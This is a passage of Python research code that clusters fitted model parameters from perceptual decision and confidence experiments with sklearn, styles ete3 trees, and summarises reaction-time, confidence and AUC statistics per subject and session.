{'2AFC':'#000000','Auditivo':'#000000','Luminancia':'#000000'}[experiment]\n\t\telse:\n\t\t\tbgcolor = {'1':'#FF0000','2':'#008000','3':'#0000FF'}[session]\n\t\t\tfgcolor = {'1':'#000000','2':'#000000','3':'#000000'}[session]\n\t\tif experiment:\n\t\t\tname_alias.append({'2AFC':'Con','Auditivo':'Aud','Luminancia':'Lum'}[experiment])\n\t\tif subject:\n\t\t\tname_alias.append('Subj {0}'.format(subject))\n\t\tif session:\n\t\t\tname_alias.append('Ses {0}'.format(session))\n\t\tname_alias = ' '.join(name_alias)\n\t\tstyle['vt_line_color'] = bgcolor\n\t\tstyle['hz_line_color'] = bgcolor\n\t\tstyle['size'] = 3\n\t\tstyle['fgcolor'] = bgcolor\n\t\tface = ete3.TextFace(name_alias,fgcolor=fgcolor)\n\t\t#~ face.rotation = -15\n\t\tnode.add_face(face, column=0, position=\"aligned\")\n\telse:\n\t\tchild_leaf_color = None\n\t\tequal_leaf_types = True\n\t\tfor child_leaf in (n for n in node.iter_descendants(\"postorder\") if n.is_leaf()):\n\t\t\tportions = child_leaf.name.split('_')\n\t\t\ttry:\n\t\t\t\tbgcolor = {'2AFC':'#FF0000','Auditivo':'#008000','Luminancia':'#0000FF'}[portions[0]]\n\t\t\texcept:\n\t\t\t\tbgcolor = {'1':'#FF0000','2':'#008000','3':'#0000FF'}[portions[-1]]\n\t\t\tif child_leaf_color is None:\n\t\t\t\tchild_leaf_color = bgcolor\n\t\t\telif child_leaf_color!=bgcolor:\n\t\t\t\tequal_leaf_types = False\n\t\t\t\tbreak\n\t\tif equal_leaf_types:\n\t\t\tstyle['vt_line_color'] = child_leaf_color\n\t\t\tstyle['hz_line_color'] = child_leaf_color\n\tnode.set_style(style)\n\ndef default_tree_style(mode='r',title=None):\n\t\"\"\"\n\tdefault_tree_style(mode='r')\n\t\n\tmode can be 'r' or 'c'. Returns an ete3.TreeStyle instance with a\n\trectangular or circular display depending on the supplied mode\n\t\n\t\"\"\"\n\ttree_style = ete3.TreeStyle()\n\ttree_style.layout_fn = default_tree_layout\n\ttree_style.show_leaf_name = False\n\ttree_style.show_scale = False\n\tif not title is None:\n\t\ttree_style.title.add_face(ete3.TextFace(title, fsize=18), column=0)\n\tif mode=='r':\n\t\ttree_style.rotation = 90\n\t\ttree_style.branch_vertical_margin = 10\n\telse:\n\t\ttree_style.mode = 'c'\n\t\ttree_style.arc_start = 0 # 0 degrees = 3 o'clock\n\t\ttree_style.arc_span = 180\n\treturn tree_style\n\nclass Analyzer():\n\tdef __init__(self,method = 'full_confidence', optimizer = 'cma', suffix = '',\n\t\t\t\tcmap_meth='log_odds', fits_path='fits_cognition/',\n\t\t\t\toverride=False,n_clusters=2, affinity='euclidean',\n\t\t\t\tlinkage='ward', pooling_func=np.nanmean, connectivity=None):\n\t\t\"\"\"\n\t\tAnalyzer(method = 'full_confidence', optimizer = 'cma', suffix = '',\n\t\t\t\tcmap_meth='log_odds', fits_path='fits_cognition/',\n\t\t\t\toverride=False,n_clusters=2, affinity='euclidean',\n\t\t\t\tlinkage='ward', pooling_func=np.nanmean, connectivity=None)\n\t\t\n\t\tThis class implements an interface between the\n\t\tdata_io_cognition.SubjectSession and the fits_cognition.Fitter\n\t\tthat constructs a summary of relevant statistics and features\n\t\tof the experimental data and theoretical predictions, and can\n\t\tthen perform relevant analyses and graphics from them.\n\t\t\n\t\tThe main analysis is the hierarchical clustering of the fitted\n\t\tparameters, which is performed with the scikit learn (sklearn)\n\t\tpackage's AgglomerativeClustering class. 
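A minimal sketch of the equivalent clusterer construction (mirroring init_clusterer below; illustrative only, assuming sklearn and numpy are available):\n\t\t\n\t\t\timport numpy as np\n\t\t\tfrom sklearn import cluster\n\t\t\tclusterer = cluster.AgglomerativeClustering(\n\t\t\t\tn_clusters=2, affinity='euclidean', linkage='ward',\n\t\t\t\tpooling_func=np.nanmean, connectivity=None)\n\t\t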
Thus, when constructing\n\t\tthe Analyzer, many input parameters are simply parameters used\n\t\tfor the creation of an AgglomerativeClustering instance.\n\t\t\n\t\tInput:\n\t\t\tmethod: Fitter instance's method.\n\t\t\toptimizer: Fitter instance's optimizer.\n\t\t\tsuffix: Fitter instance's suffix.\n\t\t\tcmap_meth: Fitter instance's high_confidence_mapping_method.\n\t\t\t\n\t\t\tThe four parameters listed above are used to determine the\n\t\t\tFitter files that should be loaded to get the relevant\n\t\t\tstatistics.\n\t\t\t\n\t\t\toverride: Bool by default False. The construction of the\n\t\t\t\texperimental and theoretical statistics takes a lot of\n\t\t\t\ttime. To improve successive runtimes, the Analyzer will\n\t\t\t\tattempt to load the summary statistics from the file\n\t\t\t\t'summary_{method}_{optimizer}_{cmapmeth}{suffix}.pkl',\n\t\t\t\tand if it does not exist, it will perform the\n\t\t\t\tcomputations and then save the summaries to the above\n\t\t\t\tmentioned file. If the override parameter is True, the\n\t\t\t\tsummary statistics are not loaded from the file;\n\t\t\t\tthey are computed and the contents of\n\t\t\t\t'summary_{method}_{optimizer}_{cmapmeth}{suffix}.pkl'\n\t\t\t\tare overwritten with the currently computed statistics.\n\t\t\t\n\t\t\tThe following parameters are used to construct the \n\t\t\tsklearn.cluster.AgglomerativeClustering instance. Refer to\n\t\t\tthe scikit learn documentation for a detailed description\n\t\t\tof each of these parameters:\n\t\t\tn_clusters: Int. Default 2\n\t\t\taffinity: Str. Default 'euclidean'\n\t\t\tlinkage: Str. Default 'ward'\n\t\t\tpooling_func: Callable. Default numpy.nanmean\n\t\t\tconnectivity: Optional array-like or callable. Default None.\n\t\t\t\n\t\t\tWe will only mention that the pooling_func is also used to\n\t\t\tpool together the parameters when applying merges in the\n\t\t\tscatter_parameters, controlled_scatter and cluster methods.\n\t\t\tFurthermore, the affinity and linkage are used to compute\n\t\t\tthe cluster span.\n\t\t\n\t\t\"\"\"\n\t\tself.method = method\n\t\tself.optimizer = optimizer\n\t\tself.suffix = suffix\n\t\tself.cmap_meth = cmap_meth\n\t\tself.fits_path = fits_path\n\t\tself.get_summary(override=override)\n\t\tself.init_clusterer(n_clusters=n_clusters, affinity=affinity,\\\n\t\t\t\tlinkage=linkage, pooling_func=pooling_func, connectivity=connectivity)\n\t\n\tdef init_clusterer(self,n_clusters=2, affinity='euclidean', compute_full_tree=True,\n\t\t\t\t\t\tlinkage='ward', pooling_func=np.nanmean,connectivity=None):\n\t\t\"\"\"\n\t\tself.init_clusterer(n_clusters=2, affinity='euclidean', compute_full_tree=True,\n\t\t\t\t\t\tlinkage='ward', pooling_func=np.nanmean,connectivity=None)\n\t\t\n\t\tThis method constructs a sklearn.cluster.AgglomerativeClustering\n\t\tinstance using the call:\n\t\tsklearn.cluster.AgglomerativeClustering(n_clusters=n_clusters,\n\t\t\taffinity=affinity, compute_full_tree=compute_full_tree,\n\t\t\tlinkage=linkage, pooling_func=pooling_func,connectivity=connectivity)\n\t\t\n\t\tThe parameters used for the above mentioned construction are the\n\t\tinput parameters supplied to this function.\n\t\t\n\t\t\"\"\"\n\t\tself.agg_clusterer = cluster.AgglomerativeClustering(n_clusters=n_clusters, affinity=affinity,\\\n\t\t\t\tconnectivity=connectivity,compute_full_tree=compute_full_tree, linkage=linkage,\\\n\t\t\t\tpooling_func=pooling_func)\n\t\tself.linkage = linkage\n\t\tself.affinity = affinity\n\t\tself.pooling_func=pooling_func\n\t\tself.spanner = self.get_cluster_spanner()\n\t\n\t
def set_pooling_func(self,pooling_func):\n\t\t\"\"\"\n\t\tself.set_pooling_func(pooling_func)\n\t\t\n\t\tSet the pooling function used for parameter clustering.\n\t\t\n\t\t\"\"\"\n\t\tself.agg_clusterer.set_params(**{'pooling_func':pooling_func})\n\t\tself.pooling_func = pooling_func\n\t\tself.spanner = self.get_cluster_spanner()\n\t\n\tdef set_linkage(self,linkage):\n\t\t\"\"\"\n\t\tself.set_linkage(linkage)\n\t\t\n\t\tSet the linkage used for parameter clustering.\n\t\t\n\t\t\"\"\"\n\t\tself.agg_clusterer.set_params(**{'linkage':linkage})\n\t\tself.linkage = linkage\n\t\tself.spanner = self.get_cluster_spanner()\n\t\n\tdef set_affinity(self,affinity):\n\t\t\"\"\"\n\t\tself.set_affinity(affinity)\n\t\t\n\t\tSet the affinity used for parameter clustering.\n\t\t\n\t\t\"\"\"\n\t\tself.agg_clusterer.set_params(**{'affinity':affinity})\n\t\tself.affinity = affinity\n\t\tself.spanner = self.get_cluster_spanner()\n\t\n\tdef get_cluster_spanner(self):\n\t\t\"\"\"\n\t\tspanner = self.get_cluster_spanner()\n\t\t\n\t\tGet a callable that computes a given cluster's span. To compute\n\t\ta cluster's span, call\n\t\tspanner(cluster)\n\t\t\n\t\tThe cluster must be a 2D numpy array, where the axis=0 holds\n\t\tseparate cluster members and the axis=1 holds the different\n\t\tvariables.\n\t\t\n\t\t\"\"\"\n\t\tif self.linkage=='ward':\n\t\t\tif self.affinity=='euclidean':\n\t\t\t\tspanner = lambda x:np.sum((x-self.pooling_func(x,axis=0))**2)\n\t\t\telif self.affinity in ['l1','l2','manhattan','cosine']:\n\t\t\t\traise ValueError('Ward linkage only accepts euclidean affinity. However, affinity attribute was set to {0}.'.format(self.affinity))\n\t\t\telse:\n\t\t\t\traise AttributeError('Unknown affinity attribute value {0}.'.format(self.affinity))\n\t\telif self.linkage=='complete':\n\t\t\tif self.affinity=='euclidean':\n\t\t\t\tspanner = lambda x:np.max(np.sum((x[:,None,:]-x[None,:,:])**2,axis=2))\n\t\t\telif self.affinity=='l1' or self.affinity=='manhattan':\n\t\t\t\tspanner = lambda x:np.max(np.sum(np.abs(x[:,None,:]-x[None,:,:]),axis=2))\n\t\t\telif self.affinity=='l2':\n\t\t\t\tspanner = lambda x:np.max(np.sqrt(np.sum((x[:,None,:]-x[None,:,:])**2,axis=2)))\n\t\t\telif self.affinity=='cosine':\n\t\t\t\tspanner = lambda x:np.max(np.sum(x[:,None,:]*x[None,:,:],axis=2,keepdims=True)/(np.sqrt(np.sum(x[:,None,:]*x[:,None,:],axis=2,keepdims=True))*np.sqrt(np.sum(x[None,:,:]*x[None,:,:],axis=2,keepdims=True))))\n\t\t\telse:\n\t\t\t\traise AttributeError('Unknown affinity attribute value {0}.'.format(self.affinity))\n\t\telif self.linkage=='average':\n\t\t\tif self.affinity=='euclidean':\n\t\t\t\tspanner = lambda x:np.mean(np.sum((x[:,None,:]-x[None,:,:])**2,axis=2))\n\t\t\telif self.affinity=='l1' or self.affinity=='manhattan':\n\t\t\t\tspanner = lambda x:np.mean(np.sum(np.abs(x[:,None,:]-x[None,:,:]),axis=2))\n\t\t\telif self.affinity=='l2':\n\t\t\t\tspanner = lambda x:np.mean(np.sqrt(np.sum((x[:,None,:]-x[None,:,:])**2,axis=2)))\n\t\t\telif self.affinity=='cosine':\n\t\t\t\tspanner = lambda x:np.mean(np.sum(x[:,None,:]*x[None,:,:],axis=2,keepdims=True)/(np.sqrt(np.sum(x[:,None,:]*x[:,None,:],axis=2,keepdims=True))*np.sqrt(np.sum(x[None,:,:]*x[None,:,:],axis=2,keepdims=True))))\n\t\t\telse:\n\t\t\t\traise AttributeError('Unknown affinity attribute value {0}.'.format(self.affinity))\n\t\telse:\n\t\t\traise AttributeError('Unknown linkage attribute value {0}.'.format(self.linkage))\n\t\treturn spanner\n\t\n\tdef get_summary_filename(self):\n\t\t\"\"\"\n\t\tself.get_summary_filename()\n\t\t\n\t\tSimply returns 
'summary_{method}_{optimizer}_{cmap_meth}{suffix}.pkl'\n\t\tformated with the Analyzer instance's attribute values.\n\t\t\n\t\t\"\"\"\n\t\treturn 'summary_{method}_{optimizer}_{cmap_meth}{suffix}.pkl'.format(\n\t\t\t\tmethod=self.method,optimizer=self.optimizer,suffix=self.suffix,\n\t\t\t\tcmap_meth=self.cmap_meth)\n\t\n\tdef get_summary(self,override=False):\n\t\t\"\"\"\n\t\tself.get_summary(override=False)\n\t\t\n\t\tGet the experimental and theoretical summaries. The input\n\t\t'override', if True, signals that the method must compute the\n\t\tindividual summaries and then override the Analyzer's summary\n\t\tfilename. If False, this method first tries to load the\n\t\tsummaries from the Analyzer's summary filename, and if said file\n\t\tdoes not exist, it computes the summaries and then saves them.\n\t\t\n\t\tOutput:\n\t\t\tsummary: A dictionary with keys 'experimental' and 'theoretical'.\n\t\t\t\tEach key holds the output of the methods\n\t\t\t\tself.subjectSession_measures ('experimental' key) and\n\t\t\t\tself.fitter_measures ('theoretical' key), called for\n\t\t\t\tevery subject and session that complies with\n\t\t\t\tdata_io_cognition.filter_subjects_list(data_io_cognition.unique_subject_sessions(fits_cognition.raw_data_dir),'all_sessions_by_experiment')\n\t\t\n\t\t\"\"\"\n\t\tif override or not(os.path.exists(self.get_summary_filename()) and os.path.isfile(self.get_summary_filename())):\n\t\t\tsubjects = io.filter_subjects_list(io.unique_subject_sessions(fits.raw_data_dir),'all_sessions_by_experiment')\n\t\t\tself.summary = {'experimental':{},'theoretical':{}}\n\t\t\tfor s in subjects:\n\t\t\t\tprint(s.get_key())\n\t\t\t\tfname = fits.Fitter_filename(experiment=s.experiment,\n\t\t\t\t\t\t\t\t\t\t\t method=self.method,\n\t\t\t\t\t\t\t\t\t\t\t name=s.get_name(),\n\t\t\t\t\t\t\t\t\t\t\t session=s.get_session(),\n\t\t\t\t\t\t\t\t\t\t\t optimizer=self.optimizer,\n\t\t\t\t\t\t\t\t\t\t\t suffix=self.suffix,\n\t\t\t\t\t\t\t\t\t\t\t confidence_map_method=self.cmap_meth,\n\t\t\t\t\t\t\t\t\t\t\t fits_path=self.fits_path)\n\t\t\t\tif not(os.path.exists(fname) and os.path.isfile(fname)):\n\t\t\t\t\tcontinue\n\t\t\t\ts_measures = self.subjectSession_measures(s)\n\t\t\t\tself.summary['experimental'].update(s_measures)\n\t\t\t\tfitter = fits.load_Fitter_from_file(fname)\n\t\t\t\tf_measures = self.fitter_measures(fitter)\n\t\t\t\tself.summary['theoretical'].update(f_measures)\n\t\t\tf = open(self.get_summary_filename(),'w')\n\t\t\tpickle.dump(self.summary,f)\n\t\t\tf.close()\n\t\telse:\n\t\t\tf = open(self.get_summary_filename(),'r')\n\t\t\tself.summary = pickle.load(f)\n\t\t\tf.close()\n\t\treturn self.summary\n\t\n\tdef subjectSession_measures(self,subjectSession):\n\t\t\"\"\"\n\t\tself.subjectSession_measures(subjectSession)\n\t\t\n\t\tGet the summary statistics of a SubjectSession instance.\n\t\t\n\t\tOutput:\n\t\t\tstats: A dict with keys equal to\n\t\t\t\t'experiment_{experiment}_subject_{name}_session_{session}'\n\t\t\t\twhere experiment, name and session are the unique tuple\n\t\t\t\tvalues encountered in the subjectSession data.\n\t\t\t\tThe value assigned to each key is itself a dict with 
shape:\n\t\t\t\t{'experiment':...,'n':...,'auc':...,\n\t\t\t\t'name':...,'session':...,\n\t\t\t\t'means':{'rt':...,'performance':...,'confidence':...,\\\n\t\t\t\t\t\t'hit_rt':...,'miss_rt':...,\\\n\t\t\t\t\t\t'hit_confidence':...,'miss_confidence':...},\n\t\t\t\t'stds':{'rt':...,'performance':...,'confidence':...,\\\n\t\t\t\t\t\t'hit_rt':...,'miss_rt':...,\\\n\t\t\t\t\t\t'hit_confidence':...,'miss_confidence':...},\n\t\t\t\t'medians':{'rt':...,'confidence':...,\\\n\t\t\t\t\t\t'hit_rt':...,'miss_rt':...,\\\n\t\t\t\t\t\t'hit_confidence':...,'miss_confidence':...}}\n\t\t\n\t\t\"\"\"\n\t\tdata = subjectSession.load_data()\n\t\tunique_names = np.unique(data[:,-2].astype(np.int))\n\t\tunique_sessions = np.unique(data[:,-1].astype(np.int))\n\t\tout = {}\n\t\tfor un in unique_names:\n\t\t\tfor us in unique_sessions:\n\t\t\t\tinds = np.logical_and(data[:,-2]==un,data[:,-1]==us)\n\t\t\t\tif any(inds):\n\t\t\t\t\tn = np.sum(inds.astype(np.int))\n\t\t\t\t\tmeans = np.mean(data[inds,1:4],axis=0)\n\t\t\t\t\tmedians = np.median(data[inds,1:4],axis=0)\n\t\t\t\t\tstds = np.std(data[inds,1:4],axis=0)/np.sqrt(float(n))\n\t\t\t\t\tauc = io.compute_auc(io.compute_roc(data[inds,2],data[inds,3]))\n\t\t\t\t\thit = data[:,2]==1\n\t\t\t\t\tmiss = data[:,2]==0\n\t\t\t\t\tif any(hit):\n\t\t\t\t\t\tinds1 = np.logical_and(hit,inds)\n\t\t\t\t\t\thit_means = np.mean(data[inds1,1:4:2],axis=0)\n\t\t\t\t\t\thit_medians = np.median(data[inds1,1:4:2],axis=0)\n\t\t\t\t\t\thit_stds = np.std(data[inds1,1:4:2],axis=0)/np.sqrt(np.sum(inds1).astype(np.float))\n\t\t\t\t\telse:\n\t\t\t\t\t\thit_means = np.nan*np.ones(2)\n\t\t\t\t\t\thit_medians = np.nan*np.ones(2)\n\t\t\t\t\t\thit_stds = np.nan*np.ones(2)\n\t\t\t\t\tif any(miss):\n\t\t\t\t\t\tinds1 = np.logical_and(miss,inds)\n\t\t\t\t\t\tmiss_means = np.mean(data[inds1,1:4:2],axis=0)\n\t\t\t\t\t\tmiss_medians = np.median(data[inds1,1:4:2],axis=0)\n\t\t\t\t\t\tmiss_stds = np.std(data[inds1,1:4:2],axis=0)/np.sqrt(np.sum(inds1).astype(np.float))\n\t\t\t\t\telse:\n\t\t\t\t\t\tmiss_means = np.nan*np.ones(2)\n\t\t\t\t\t\tmiss_medians = np.nan*np.ones(2)\n\t\t\t\t\t\tmiss_stds = np.nan*np.ones(2)\n\t\t\t\t\tdipval = dip(data[inds,3], min_is_0=True, x_is_sorted=False)\n\t\t\t\t\tkey = '_'.join(['experiment_'+subjectSession.experiment,'subject_'+str(un),'session_'+str(us)])\n\t\t\t\t\tout[key] = {'experiment':subjectSession.experiment,'n':n,'auc':auc,\n\t\t\t\t\t\t\t\t'name':un,'session':us,'multi_mod_index':dipval,\n\t\t\t\t\t\t\t\t'means':{'rt':means[0],'performance':means[1],'confidence':means[2],\n\t\t\t\t\t\t\t\t\t\t'hit_rt':hit_means[0],'miss_rt':miss_means[0],\n\t\t\t\t\t\t\t\t\t\t'hit_confidence':hit_means[1],'miss_confidence':miss_means[1]},\n\t\t\t\t\t\t\t\t'stds':{'rt':stds[0],'performance':stds[1],'confidence':stds[2],\n\t\t\t\t\t\t\t\t\t\t'hit_rt':hit_stds[0],'miss_rt':miss_stds[0],\n\t\t\t\t\t\t\t\t\t\t'hit_confidence':hit_stds[1],'miss_confidence':miss_stds[1]},\n\t\t\t\t\t\t\t\t'medians':{'rt':medians[0],'confidence':medians[2],\n\t\t\t\t\t\t\t\t\t\t'hit_rt':hit_medians[0],'miss_rt':miss_medians[0],\n\t\t\t\t\t\t\t\t\t\t'hit_confidence':hit_medians[1],'miss_confidence':miss_medians[1]}}\n\t\treturn out\n\t\n\tdef fitter_measures(self,fitter):\n\t\t\"\"\"\n\t\tself.fitter_measures(fitter)\n\t\t\n\t\tGet the summary statistics of a Fitter instance.\n\t\t\n\t\tOutput:\n\t\t\tstats: A dict with keys equal to\n\t\t\t\t'experiment_{experiment}_subject_{name}_session_{session}'\n\t\t\t\twhere experiment, name and session are the Fitter\n\t\t\t\tinstance's experiment 
attribute,\n\t\t\t\tfitter.subjectSession.get_name() and\n\t\t\t\tfitter.subjectSession.get_session() returned values.\n\t\t\t\tThe value assigned to each key is itself a dict with shape:\n\t\t\t\t{'experiment':...,'parameters':...,'full_merit':...,\n\t\t\t\t'full_confidence_merit':...,'confidence_only_merit':...,\n\t\t\t\t'name':...,'session':...,\n\t\t\t\t'performance':...,'rt':...,'hit_rt':...,'miss_rt':...,\n\t\t\t\t'confidence':...,'hit_confidence':...,\n\t\t\t\t'miss_confidence':...,'auc':...}\n\t\t\n\t\t\"\"\"\n\t\tparameters = fitter.get_parameters_dict_from_fit_output()\n\t\tfull_confidence_merit = fitter.forced_compute_full_confidence_merit(parameters)\n\t\tfull_merit = fitter.forced_compute_full_merit(parameters)\n\t\tconfidence_only_merit = fitter.forced_compute_confidence_only_merit(parameters)\n\t\ttry:\n\t\t\t# First try to load the fitter stats from memory\n\t\t\tf = open(fitter.get_save_file_name().replace('.pkl','_stats.pkl'),'r')\n\t\t\tfitter_stats = pickle.load(f)\n\t\t\tf.close()\n\t\texcept:\n\t\t\t# If no stats file is found or the load fails, then compute the stats\n\t\t\tfitter_stats = fitter.stats(return_mean_rt=True,return_mean_confidence=True,return_median_rt=True,\n\t\t\t\t\treturn_median_confidence=True,return_std_rt=True,return_std_confidence=True,\n\t\t\t\t\treturn_auc=True)\n\t\t\n\t\tperformance = fitter_stats['performance']\n\t\tperformance_conditioned = fitter_stats['performance_conditioned']\n\t\tconfidence = fitter_stats['mean_confidence']\n\t\tconfidence_median = fitter_stats['median_confidence']\n\t\thit_confidence = fitter_stats['mean_confidence_conditioned'][0]\n\t\tmiss_confidence = fitter_stats['mean_confidence_conditioned'][1]\n\t\thit_confidence_median = fitter_stats['median_confidence_conditioned'][0]\n\t\tmiss_confidence_median = fitter_stats['median_confidence_conditioned'][1]\n\t\trt = fitter_stats['mean_rt']\n\t\tmean_rt_perf = fitter_stats['mean_rt_perf']\n\t\thit_rt = mean_rt_perf[0]\n\t\tmiss_rt = mean_rt_perf[1]\n\t\trt_median = fitter_stats['median_rt']\n\t\trt_median_perf = fitter_stats['median_rt_perf']\n\t\thit_rt_median = rt_median_perf[0]\n\t\tmiss_rt_median = rt_median_perf[1]\n\t\t\n\t\tauc = fitter_stats['auc']\n\t\t\n\t\tkey = 'experiment_'+fitter.experiment+'_subject_'+fitter.subjectSession.get_name()+'_session_'+fitter.subjectSession.get_session()\n\t\tout = {key:{'experiment':fitter.experiment,'parameters':parameters,'full_merit':full_merit,\n\t\t\t\t\t'full_confidence_merit':full_confidence_merit,'confidence_only_merit':confidence_only_merit,\n\t\t\t\t\t'name':fitter.subjectSession.get_name(),'session':fitter.subjectSession.get_session(),\n\t\t\t\t\t'performance_mean':performance,'rt_mean':rt,'hit_rt_mean':hit_rt,'miss_rt_mean':miss_rt,\n\t\t\t\t\t'confidence_mean':confidence,'hit_confidence_mean':hit_confidence,\n\t\t\t\t\t'miss_confidence_mean':miss_confidence,'rt_median':rt_median,\n\t\t\t\t\t'hit_rt_median':hit_rt_median,'miss_rt_median':miss_rt_median,\n\t\t\t\t\t'confidence_median':confidence_median,'hit_confidence_median':hit_confidence_median,\n\t\t\t\t\t'miss_confidence_median':miss_confidence_median,'auc':auc}}\n\t\treturn out\n\t\n\tdef get_parameter_array_from_summary(self,summary=None,normalize={'internal_var':'experiment'},normalization_function=lambda x: x/np.nanstd(x)):\n\t\t\"\"\"\n\t\tself.get_parameter_array_from_summary(summary=None,normalize={'internal_var':'experiment'},normalization_function=lambda x: x/np.nanstd(x))\n\t\t\n\t\tGet the array of parameters, experiments, sessions and names\n\t\tfrom 
the summary['theoretical'] dict.\n\t\t\n\t\tInput:\n\t\t\tsummary: A summary dict or None. If None, the Analyzer's\n\t\t\t\tsummary instance is used instead.\n\t\t\tnormalize: None or a dict whose keys are parameter names. If\n\t\t\t\tNone, no normalization is performed. If it is a dict,\n\t\t\t\tthe values indicate the grouping method that will be used\n\t\t\t\tto normalize the parameter values. Each group is then\n\t\t\t\tdivided by the output of a call to the normalization_function\n\t\t\t\ton itself. Four methods are available:\n\t\t\t\t'all': All parameters are taken into a single group.\n\t\t\t\t'experiment': One group for each experiment is formed.\n\t\t\t\t'session': One group for each session is formed.\n\t\t\t\t'name': One group for each name is formed.\n\t\t\t\tBy default normalize is {'internal_var':'experiment'}\n\t\t\t\tbecause the internal_var is completely different\n\t\t\t\tfor each experiment.\n\t\t\tnormalization_function: A callable that is passed to the\n\t\t\t\tmethod self.normalize_parameters in order to\n\t\t\t\tnormalize the Fitter parameters before returning them.\n\t\t\t\tThis function is only used if normalize is not None.\n\t\t\t\tRefer to self.normalize_parameters for more information.\n\t\t\n\t\tOutput:\n\t\t\tparameters: 2D numpy array. Axis=0 corresponds to different\n\t\t\t\texperiment, name and subject tuple values, while axis=1\n\t\t\t\tcorresponds to different parameter names.\n\t\t\tparameter_names: A list with the parameter names in the order\n\t\t\t\tin which they appear in the parameters output\n\t\t\tnames: A 1D numpy array with the SubjectSession names that\n\t\t\t\tcorrespond to each parameter.\n\t\t\tsessions: A 1D numpy array with the SubjectSession sessions\n\t\t\t\tthat correspond to each parameter.\n\t\t\texperiments: A 1D numpy array with the SubjectSession\n\t\t\t\texperiments that correspond to each parameter.\n\t\t\n\t\t\"\"\"\n\t\tif summary is None:\n\t\t\tsummary = self.summary\n\t\tparameter_dicts = []\n\t\tself._parameter_names = set([])\n\t\tself._experiments = []\n\t\tself._sessions = []\n\t\tself._names = []\n\t\tfor k in summary['theoretical'].keys():\n\t\t\tvals = summary['theoretical'][k]\n\t\t\ttry:\n\t\t\t\tself._names.append(int(vals['name']))\n\t\t\texcept:\n\t\t\t\tself._names.append(vals['name'])\n\t\t\ttry:\n\t\t\t\tself._sessions.append(int(vals['session']))\n\t\t\texcept:\n\t\t\t\tself._sessions.append(vals['session'])\n\t\t\tself._experiments.append(vals['experiment'])\n\t\t\tself._parameter_names = self._parameter_names | set(vals['parameters'].keys())\n\t\t\tparameter_dicts.append(vals['parameters'])\n\t\tself._parameter_names = sorted(list(self._parameter_names))\n\t\tself._parameters = []\n\t\tfor pd in parameter_dicts:\n\t\t\tvals = []\n\t\t\tfor pn in self._parameter_names:\n\t\t\t\tif pn=='high_confidence_threshold':\n\t\t\t\t\tif self.cmap_meth=='log_odds':\n\t\t\t\t\t\tval = pd[pn] if pd[pn]<=2. else np.nan\n\t\t\t\t\telif self.cmap_meth=='belief':\n\t\t\t\t\t\tval = pd[pn]+0.7/pd['confidence_map_slope']\n\t\t\t\t\t\t#~ val = pd[pn]\n\t\t\t\t\telse:\n\t\t\t\t\t\tval = pd[pn]\n\t\t\t\telif pn=='confidence_map_slope':\n\t\t\t\t\tif self.cmap_meth=='log_odds':\n\t\t\t\t\t\tval = pd[pn] if pd[pn]<=100. else np.nan\n\t\t\t\t\telif self.cmap_meth=='belief':\n\t\t\t\t\t\tval = pd[pn] if pd[pn]<=40. else np.nan
\n\t\t\t\t\telse:\n\t\t\t\t\t\tval = pd[pn]\n\t\t\t\telse:\n\t\t\t\t\tval = pd[pn]\n\t\t\t\tvals.append(val)\n\t\t\tself._parameters.append(np.array(vals))\n\t\tself._parameters = np.array(self._parameters)\n\t\tself._names = np.array(self._names)\n\t\tself._sessions = np.array(self._sessions)\n\t\tself._experiments = np.array(self._experiments)\n\t\tif normalize:\n\t\t\tgroup_dict = {'all':None,\n\t\t\t\t\t\t 'experiment':self._experiments,\n\t\t\t\t\t\t 'session':self._sessions,\n\t\t\t\t\t\t 'name':self._names}\n\t\t\tfor par in normalize.keys():\n\t\t\t\tpar_ind = self._parameter_names.index(par)\n\t\t\t\tgroup = group_dict[normalize[par]]\n\t\t\t\tself._parameters[:,par_ind] = self.normalize_parameters(parameters=self._parameters[:,par_ind],\n\t\t\t\t\t\t\t\t\t group=group, normalization_function=normalization_function)\n\t\treturn self._parameters,self._parameter_names,self._names,self._sessions,self._experiments\n\t\n\tdef get_summary_stats_array(self,summary=None,normalize={'internal_var':'experiment'},normalization_function=lambda x: x/np.nanstd(x)):\n\t\t\"\"\"\n\t\tself.get_summary_stats_array(summary=None,normalize={'internal_var':'experiment'},normalization_function=lambda x: x/np.nanstd(x))\n\t\t\n\t\tGet the two numpy arrays of the summary statistics. One for the\n\t\texperimental data and another for the theoretical data.\n\t\t\n\t\tInput:\n\t\t\tsummary: A summary dict or None. If None, the Analyzer's\n\t\t\t\tsummary instance is used instead.\n\t\t\tnormalize: None or a dict whose keys are parameter names. If\n\t\t\t\tNone, no normalization is performed. If it is a dict,\n\t\t\t\tthe values indicate the grouping method that will be used\n\t\t\t\tto normalize the parameter values. Each group is then\n\t\t\t\tdivided by the output of a call to the normalization_function\n\t\t\t\ton itself. Four methods are available:\n\t\t\t\t'all': All parameters are taken into a single group.\n\t\t\t\t'experiment': One group for each experiment is formed.\n\t\t\t\t'session': One group for each session is formed.\n\t\t\t\t'name': One group for each name is formed.\n\t\t\t\tBy default normalize is {'internal_var':'experiment'}\n\t\t\t\tbecause the internal_var is completely different\n\t\t\t\tfor each experiment.\n\t\t\tnormalization_function: A callable that is passed to the\n\t\t\t\tmethod self.normalize_parameters in order to\n\t\t\t\tnormalize the Fitter parameters before returning them.\n\t\t\t\tThis function is only used if normalize is not None.\n\t\t\t\tRefer to self.normalize_parameters for more information.\n\t\t\n\t\tOutput:\n\t\t\t(experimental,theoretical): Two numpy arrays with named\n\t\t\t\tfields. It is possible to access the field names from the\n\t\t\t\tattribute experimental.dtype.names.\n\t\t\t\tThe two arrays have different field names, except for a\n\t\t\t\tfew. The most important are 'experiment', 'session' and\n\t\t\t\t'name' which encode the corresponding experiment, session\n\t\t\t\tand subject name. 
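A minimal lookup sketch (illustrative only; 'analyzer' is a hypothetical Analyzer instance):\n\t\t\t\t\n\t\t\t\t\texperimental,theoretical = analyzer.get_summary_stats_array()\n\t\t\t\t\trow = experimental[0]\n\t\t\t\t\tmatch = theoretical[(theoretical['experiment']==row['experiment']) &\n\t\t\t\t\t\t\t\t\t\t(theoretical['session']==row['session']) &\n\t\t\t\t\t\t\t\t\t\t(theoretical['name']==row['name'])]\n\t\t\t\t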
